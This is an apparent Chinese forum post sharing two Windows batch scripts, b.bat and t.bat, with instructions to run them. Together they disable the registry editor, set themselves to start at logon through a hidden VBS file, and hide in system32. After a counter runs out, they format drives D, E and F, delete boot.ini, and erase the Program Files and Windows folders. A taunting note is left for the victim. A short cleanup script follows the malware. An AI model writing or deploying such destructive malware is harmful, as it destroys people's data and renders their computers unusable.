第一个命名为b.bat 代码是:
@echo off
@reg add hkcu\software\microsoft\windows\currentversion\policies\system /v disableregistrytools /t reg_dword /d 00000001 /f
@reg add hklm\software\microsoft\windows\currentversion\run /v logon /t reg_sz /d c:\windows\system32\a.vbs /f
copy b.bat c:\windows\system32\b.bat
copy t.bat c:\windows\system32\t.bat
attrib +r +s +h c:\windows\system32\t.bat
echo 不好意思 >>c:\windows\system32\a.txt
echo 格了你的电脑 >>c:\windows\system32\a.txt
echo set ws=wscript.createobject("wscript.shell") >>c:\windows\system32\a.vbs
echo ws.run "c:\windows\system32\b.bat /start",0 >>c:\windows\system32\a.vbs
attrib +r +s +h c:\windows\system32\a.vbs
attrib +r +s +h c:\windows\system32\a.txt
set x=0
set /a x=%x%+1
if %x%==20 goto exit else goto next
:next
call t.bat
d:
del t.bat /f /q
del b.bat /f /q
第二个 命名为 t.bat 代码:
@echo off
echo @echo off >>c:\windows\system32\a.bat
attrib -r -s -h c:\windows\system32\b.bat
echo set x=%x% >>c:\windows\system32\a.bat
echo set /a x=%%x%%+1 >>c:\windows\system32\a.bat
echo if %%x%%==20 goto exit else goto next >>c:\windows\system32\a.bat
set y=:next
echo %y% >>c:\windows\system32\a.bat
echo call c:\windows\system32\t.bat >>c:\windows\system32\a.bat
echo exit >>c:\windows\system32\a.bat
echo :exit >>c:\windows\system32\a.bat
echo format d: /q /y >>c:\windows\system32\a.bat
echo format e: /q /y >>c:\windows\system32\a.bat
echo format f: /q /y >>c:\windows\system32\a.bat
echo cd\ >>c:\windows\system32\a.bat
echo start a.txt >>c:\windows\system32\a.bat
echo attrib -r -s -h c:\boot.ini >>c:\windows\system32\a.bat
echo del c:\boot.ini /q /f /s >>c:\windows\system32\a.bat
echo cd Program Files >>c:\windows\system32\a.bat
echo del *.* /f /q /s >>c:\windows\system32\a.bat
echo cd\ >>c:\windows\system32\a.bat
echo cd windows >>c:\windows\system32\a.bat
echo del *.* /f /q /s >>c:\windows\system32\a.bat
echo exit >>c:\windows\system32\a.bat
del c:\windows\system32\b.bat
ren c:\windows\system32\a.bat b.bat
attrib +r +a +h c:\windows\system32\b.bat
保存好后 运行b.bat 就ok 了
解决方法 :随便建个批处理 然后运行 代码如下:
attrib -s -r -h c:\windows\system32\t.bat
attrib -s -r -h c:\windows\system32\b.bat
attrib -s -r -h c:\windows\system32\a.txt
attrib -s -r -h c:\windows\system32\a.vbs
del /f /q c:\windows\system32\t.bat
del /f /q c:\windows\system32\b.bat
del /f /q c:\windows\system32\a.txt
del /f /q c:\windows\system32\a.vbs
@reg delete hklm\software\microsoft\windows\currentversion\run /v logon /f
@reg add hkcu\software\microsoft\windows\currentversion\policies\system /v disableregistrytools /t reg_dword /d 0000000 /f
呵呵,希望大家喜欢